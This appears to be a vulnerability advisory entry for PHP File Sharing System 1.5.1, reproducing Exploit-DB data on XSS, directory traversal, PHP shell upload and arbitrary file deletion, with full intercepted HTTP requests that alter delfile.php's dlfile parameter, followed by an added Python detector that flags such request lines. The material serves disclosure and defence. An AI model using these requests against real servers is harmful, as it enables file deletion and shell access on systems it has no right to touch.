Vendor: PHP File Sharing System
By: blake
CVSS: 8,8 (HIGH)
Vulnerabilities: XSS, Directory traversal, Shell through file upload, Intercept requests
CWE: 79, 22, 264, 693
Product Name: PHP File Sharing System
Affected Version From: 1.5.1
Affected Version To: 1.5.1
Patch Exists: YES
Related CWE: N/A
CPE: a:php_file_sharing_system:php_file_sharing_system:1.5.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 with xampplite
2020

PHP File Sharing System 1.5.1 Multiple Vulnerabilities

PHP File Sharing System 1.5.1 is vulnerable to XSS, directory traversal, shell upload through the file upload feature, and tampering with intercepted requests. An attacker can exploit these vulnerabilities by sending malicious requests to the server. Such requests can be used to upload a PHP shell, traverse the directory structure, and, by modifying an intercepted request, delete system files.

Mitigation:

Update the application to the latest version and apply all security patches. Test the application for vulnerabilities and implement security measures that reject malicious requests.

Exploit-DB raw data:

Title: PHP File Sharing System 1.5.1 Multiple Vulnerabilities
Author: blake
Tested on: Windows XP SP3 with xampplite


1) XSS
http://192.168.1.149/fss/index.php?cam=

2) Directory traversal
http://192.168.1.149/fss/index.php?cam=/../../../../../../../..

3) Shell through file upload
can upload php shell, click on file, and get shell

4) can intercept requests using proxy and delete system files

intercept request in webscarab

GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=./uploads/reverse_shell_windows.php HTTP/1.1
Host: 192.168.1.149
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.149/fss/index.php?cam=

and modify

GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=log.txt HTTP/1.1
Host: 192.168.1.149
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.149/fss/index.php?cam=
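
Added example, not part of the original advisory or the application's code: a Python check for web server request lines that flags the patterns listed above (traversal or markup in cam, and delfile.php calls whose dlfile resolves outside the upload directory). The directory name uploads, the finding labels and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

UPLOAD_DIR = "uploads"  # assumption: delfile.php should only ever touch this directory

# Constructed sample request lines, modelled on the requests shown in the advisory.
SAMPLE_REQUESTS = [
    "GET /fss/index.php?cam= HTTP/1.1",
    "GET /fss/index.php?cam=/../../../../../../../.. HTTP/1.1",
    "GET /fss/index.php?cam=%252F..%252F.. HTTP/1.1",
    "GET /fss/index.php?cam=%3Cb%3Ex HTTP/1.1",
    "GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=./uploads/reverse_shell_windows.php HTTP/1.1",
    "GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=log.txt HTTP/1.1",
    "GET /fss/delfile.php?cam=&dlfile=uploads/../log.txt HTTP/1.1",
]


def classify(request_line):
    """Return a sorted list of findings for one HTTP request line."""
    try:
        _method, target, _proto = request_line.split(" ", 2)
    except ValueError:
        return ["malformed"]
    parts = urlsplit(target)  # handles both origin-form and proxy absolute-form targets
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = set()
    for cam in params.get("cam", []):
        cam = unquote(cam)  # parse_qs decoded once; decode again for double encoding
        if ".." in cam.replace("\\", "/").split("/"):
            findings.add("cam-traversal")
        if re.search(r"[<>\"']", cam):
            findings.add("cam-markup")
    if parts.path.endswith("/delfile.php"):
        for dlfile in params.get("dlfile", []):
            # Normalise ./ and ../ segments, then require the result to stay in uploads/.
            norm = posixpath.normpath(unquote(dlfile).replace("\\", "/"))
            if not norm.startswith(UPLOAD_DIR + "/"):
                findings.add("dlfile-outside-uploads")
    return sorted(findings)


def scan(lines):
    """Return (request_line, findings) for every line with at least one finding."""
    return [(line, found) for line in lines if (found := classify(line))]


if __name__ == "__main__":
    for line, found in scan(SAMPLE_REQUESTS):
        print(", ".join(found), "<-", line)
```

The same normalise-then-compare test on dlfile is what a server-side fix would apply before deleting anything; here it only reports.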